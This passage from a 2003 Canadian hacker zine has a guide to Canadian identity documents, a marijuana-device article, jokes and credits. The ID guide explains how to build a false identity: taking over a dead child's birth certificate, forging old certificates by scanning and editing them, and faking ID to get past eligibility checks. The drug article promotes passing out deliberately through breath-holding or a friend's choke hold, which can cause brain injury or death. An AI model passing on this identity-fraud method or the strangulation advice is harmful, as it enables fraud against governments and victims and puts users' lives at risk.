C. Medical ID Card D. Drivers License E. Citizenship Card A. Birth Certificate A birth certificate is the foundation document of your Canadian identity. People seeking a new identity have the choice of either faking a certificate, or obtaining a copy of a real certificate actually issued to someone else and using that one. This last method involves using the well-publicized procedure of borrowing the identity of someone who died as a child. The idea being that you look in old newspapers or on old gravestones for the details of a deceased child, who, had he lived would be the same age (roughly) as you are now. You then apply for a copy of his death certificate, which should give you enough information to apply for a copy of his birth certificate. When you have the birth certificate you have the foundation of a completely "virgin" identity - virgin because there will be no social security numbers, criminal records, and so on, in that name because the child never lived into adulthood. However, because of the ease and simplicity of this plan, it's very likely that if you find a suitable identity to borrow, someone else may have already got there before you. But the problem is you won't know that, until you start applying for drivers licenses, etc, and you have the police visiting you, wanting to know why there are two people with the same name, same birthday and same place of birth. Reproducing one of the modern card type birth certificates would be difficult for anyone unless they were skilled in such matters. It is technically possible, if you have the necessary computer equipment, including a high quality scanner and printer, and also the correct paper, which is of a bank note type. However, it would probably be a lot easier to approach someone in the US to reproduce one for you. The older type large paper certificates (used until the early 1960's) would be much easier to reproduce on a home computer. If you want to look at a certificate from this period, look up the birth announcements in an old newspaper and apply for a copy of the certificate. As in the US, theoretically only eligible applicants (ie next of kin) can apply for a copy of a certificate, but it would not be difficult to manufacture some fake ID to satisfy this requirement. Birth certificates in Canada are issued by individual provinces, not by the national government. An older type certificate could be scanned into a computer, the details erased and replaced with new details, and a new certificate reproduced. Unlike US certificates, Canadian ones do not have any embossed or raised seal, and they were printed on the same paper across Canada (whereas in the US this varied from state to state, county to county, year to year). You may think, what use is one of the old type certificates to me - surely I need one of the newer card types? Well yes, you do. But you could always apply to the Vital Statistics Agency in the province where you were "born" to change your certificate for a new type, saying you were born in Canada but had left the country as a child with your parents, hence you did not have a current type. The only potential problem here being that the Vital Statistics Agency could recognize your document as a fake if it chooses to do a check on its validity by analyzing and crosschecking the birth registration number on the certificate, plus in some provinces there is also a certificate number. B. Social Insurance Card The Social Insurance Number (SIN) was introduced in 1964 to provide Unemployment Insurance, Canada Pension Plan and Quebec Pension Plan clients with a file number. Then in 1967 it became a file identifier for Revenue Canada. In 1976 the Proof of Identity Program was established to verify the identity and status of applicants for SIN's. The Human Resources Department of Canada (HRDC) is responsible for issuing SIN's and maintaining the database. Employers must ask to see the SIN card of all new employees and the employee must show it within 3 days of starting employment. The HRDC is aware that there are problems with the issuing of SIN's and the maintenance of the database: Not all deaths are recorded nor departures from the country, causing a significant gap between the number of SIN holders and the size of the population - in 1999 there were 3.8 million more SIN's allocated to people 20 years or older than there were people living in Canada in that age group. No program currently checks revenue data and Employment Insurance data to determine whether a SIN remains in active use. THIS IS CHANGING - SEE BELOW. Many temporary SIN's are issued (for example to asylum seekers, temporary workers, etc) but no expiry date is assigned to the cards - the SIN can be used indefinitely. Between 1976 and 1999 1,242,000 temporary SIN's were issued. In 1998 some 680,000 of these SIN's were still in use, and 60% were over 5 years old - a long period of time for a temporary number. This is obviously caused by SIN holders remaining in Canada long after they are entitled to. Data is not shared between different government programs. For example, Revenue Canada does not provide the SIR (Social Insurance Register) with corrections it makes to taxpayers files when it notes discrepancies in date of birth, name, etc. Currently there is no attempt to verify documentation presented as proof of ID (eg. birth certificate) when an application is received for a SIN. This is largely because at its inception, the SIN was intended purely to act as a file identifier (account number) for certain government programs. It is only since then that it has come to be regarded as a personal identifier, or even as an identity card. THIS IS CHANGING - SEE BELOW. There are few effective measures to prevent SIN fraud. The Employment Insurance Act states that the penalty for committing any offences related to the SIN is a fine of up to $1000 and/or imprisonment for up to one year. Very few perpetrators are caught, and even then, criminal charges are rarely brought. In general, mailed applications are believed to represent a greater risk of fraud than in-person applications because certified copies are accepted, which themselves could have been certified fraudulently. THIS HAS CHANGED - SEE BELOW. There is a site on the web that will do the verification for you on-line (www.sirius.on.ca/running/sin_check.html). Applying for a number you need a primary piece of identification (most people would use a birth certificate or citizenship card) and you would apply in person at a Human Resources Centre of Canada, HRCC (these used to be known as Canadian Employment Centers). It is possible to apply by mail order if you live in a remote location, so if you preferred to do it that way you could rent a mail box in a remote town. It is not unusual for older people to be granted numbers because there is a constant flow of migrants coming to settle in Canada. Human Resources Development Canada has an excellent web site full of information about applying for a Social Insurance Number (www.hrdc-drhc.gc.ca). Changes announced October 2002, "to protect the integrity of the SIN" Because of the flaws in the system, the HRDC announced a number of measures to fight fraud and abuse of the SIN: Only original documents will be accepted as proof of ID, and the number of acceptable documents is being reduced. So it is no longer possible to send certified copies by mail. Henceforth, if applying by mail, you need to send the originals. Since August 1, 2002, baptismal certificates from Quebec or Newfoundland have not been acceptable as proof of ID. Effectively immediately, the HRDC will deactivate any SINs that have been inactive for 5 years. The HRDC is seeking to introduce expiry dates for all people who are not Canadian citizens or permanent residents. HRDC staffs are being trained to recognize fake documents, and use such techniques as are necessary (eg ultraviolet light) In addition, the HRDC is working on a project to verify birth information provided by applicants with the vital statistics departments in all the various provinces. So far, they have done this with New Brunswick, and are currently working with British Columbia. C. Medical ID card To obtain a card, contact the local office of Medical Service Plan and they will send you a form to fill in. The forms vary from province to province, but generally only require basic information and a copy of a birth certificate. If a social security number is requested, it will not necessarily be crosschecked. It's only required in case at some time in the future you become unemployed and request premium assistance. D. Drivers License It's a PVC card showing a photo, date of birth, address, license number, date of issue and expiry, signature, eye color, hair color, weight, height, and sex. Apply in person to your local Motor Vehicle Office (look in the "Links" section below to see links to offices in different provinces). The system is administered at provincial level, so varies slightly from province to province. You will be required to take a written or computer test, and an actual road test. You don't need to provide a social insurance number (unlike the US). In British Columbia, for example, you need to provide two proofs of identification, Primary and Secondary. Primary can be: Birth certificate Canadian citizenship card Canadian record of landing (a document issued to migrants to Canada) Canadian student visas Canadian work visa Returning resident permit Secondary can be: passport Driver's license, issued by Canadian or American jurisdiction Provincial ID card Naturalization certificate Canadian forces, Police, Consular or Foreign Affairs Canada ID card Marriage certificate or change of name certificate issued by Vital Statistics If you don't drive or don't want to take the driving test, you can still get a Provincial ID card from the Motor Vehicles Office to act as your photo ID. The procedure and information required is similar to applying for a driver's license, but without the driving part. E. Citizenship Card The card is automatically issued to naturalized Canadians when they are granted citizenship. Canadian citizens only get a card if they apply for it. It is intended as identification or proof of citizenship if the holder is applying for a job or passport. The card has not been modernized since 1989 and there is concern in Canadian authorities that the card is being faked because it lacks modern technology (e.g. holograms, etc). LINKS (CANADA) www.canada.gc.ca/othergov/prov_e.html list of provincial govt sites www.cic.gc.ca Citizenship and Immigration Canada www.hrdc-drhc.gc.ca Human Resources Canada (info on Soc Ins No.s) www3.gov.ab.ca/gs/services/mv Alberta Motor Vehicles (driver license info) www.icbc.com/Licensing/index.html British Columbia Motor Vehicles www.mto.gov.on.ca/english/dandv/driver/index.html Ontario Motor Vehicles www3.gov.ab.ca/services/vpe Alberta Vital Statistics www.hlth.gov.bc.ca/vs British Columbia Vital Statistics www.ccr.gov.on.ca/mcbs/english/welcome.htm Ontario Vital Statistics For provincial govt motor vehicle and vital statistic sites I have only shown links to three of the largest - other provinces either have no sites, or have only very basic sites with little information. 2003 --- lets both piss into a toilet at the same time and let our streams touch so it will be like on ghostbusters where they cross the streams and it's "bad", but it kills Zuul. --- The Ice Hooter: One hit shit! by phlux Well i've never seen plans for an ice hooter anywhere, which is unfortunate. They are pretty fucking rude. Blade hits are very effective, and combined with the ice hooter, your weed can last quite some time. As the title suggests, even some jag off weed can be turned into some one hit shit. First make some ice cubes, use a tray that makes the larger cubes. Clean a 2 litre plastic pop bottle, and cut the bottom off where the sucky ASCII art depicts; ---- <-neck ____ ' ' / \ | | <-indentation, where label begins | | | | | | | | | __ |<-bottom indentation, cut here \_/ \_/ Now punch a decent sized hole in each of the nipples Put the ice cubes in the upturned top portion of the bottle, and use the bottom to hold them in place, wrapping flexible middle plastic of the bottle back, holding it all together.. like so; ---- <-weed smoke comes out here ____ 'cCcC' / ____ \ c is the cubes |/ \| * * <-plastic rolled back If you spend abit of time wrapping back the plastic, you should get a good seal, some pliers may help. If you want to take it up a notch, score the area with some sand paper or whatever, and use hot glue. Dont make too big of a hooter, otherwise you will be inhaling unnecessary air. With a good seal you can fill the hooter with a little water. You can serve up some big hot knife hits, and as you're inhaling, you will wonder if it is just air, as the smoke will be hidden within the fogged plastic. It goes down nice and easy. Keep inhaling, and don't exhale till you can't hold it in any longer. When you exhale, you should cough and hack, gasping for air half way through exhaling. This is a good sign of a good toke. The ice hooter is good for hypoxia tokes, idealy with some good hash or oil. Take a little toke, but hold it in till you pass out. Holding your breath till you pass out is not a danger if you are healthy, with a lung full of weed smoke it is just fun.(according to my grade 9 science teacher, minus the weed bit) However, if you don't wake up after doing this, I will not be held liable. Therefore, I would save this toke for special occasions. Your lungs can't be too happy about taking in an entire toke either.. I have never had such an intense body high as my first hypoxia toke. It is fucking wild. Bury your chin in your chest to hold the toke, do not hold your breath with your throat muscles, this is not good. Only do this in a safe place like on a couch or bed, when you pass out, your muscles will breifly spasm much to the delight of the audience. Expect to experience a short period of amnesia after doing this.. for me it was maybe 2 minutes, but I couldn't even remember who I was or where I was, or who the people were that were laughing at me once I remembered I had ears! Rather then running around and then having someone bear hug you into never never land, this is a better way of embedding sigils. If you have trouble holding your breath, have a friend press the side of his hands tightly around your neck, including, and only the pinkies, constricting blood flow to the brain, but with no pressure on the throat. Naturally this should be easier when your are already a little intoxicated. A japanese strangle(sleeper) hold would work well, ensuring the person has safe arrival to the floor. I have also heard such tokes beind called wall tokes, as the recipient can alternatively stand against the wall, and the assistant(s) can lull the person onto the floor, ensuring s/he does not fall backwards. During a dry spell(if your ice hooter has seen alot of use) you could try melting the ice cubes and drinking the water. Let me know how that goes eh If you have power lungs, the ice hooter is also good for doing nostril tokes. Enjoy! 06/08/03 --- clone come to toronto and I can show you my hotrod --- __ __ __ __ __ __ __ __ _____ _____ _____ _____ __ __ __ __ _____ _____ __ __ __ __ _____ _____ __ __ _____ __ __ _____ __ __ _____ __ __ _____ * Credits Without the following contributions, this zine issue would be delayed or not released. So thank you to the following people: Cyb0rg/ASM, CyberSk4nk, Dunter, Fractal, jdm, Kybo_Ren, Phlux, Son4r, Seuss, Team Bawks.net, The Clone, Unknown, and Voyager. * Shouts Cyb0rg/ASM, Wildman, H410g3n, Wizbone, warVamp, The Question, plappy, Phlux, rt, Magma, Hack Canada, The Grasshopper Unit, Flippersmack, soapie, Alan, Flopik, dec0de, caesium, oz0n3, Kris, Grinthock, Coercion, most of to2600.org, Ms.O, Ms.V, Willow, Ann, and lastly to everyone and anyone who contributes to the ever growing Canadian Hack / Phreak scene. _ ___ ___ ___ __ ___ ___ .__ ___ ___ ___ /\ / /\ / /\ / /| |/ / /_ ||__| ___ ____ / /\ / /\ / /\ //\/ ///\/ ///\/ //| / __ | || |./ \ / __ \ / ///\/ ///\/ /// /// /\/// /\/// /\/| | \ /_/ | || || | \/ ___// /\/// /\/// /\// \/__/ \/__/ \/__/ \| |\__\ |__||__||__| /\___ /__/ \/__/ \/__/ \/ \ | \/ \/ \ | \| ' Nettwerked.Net 2003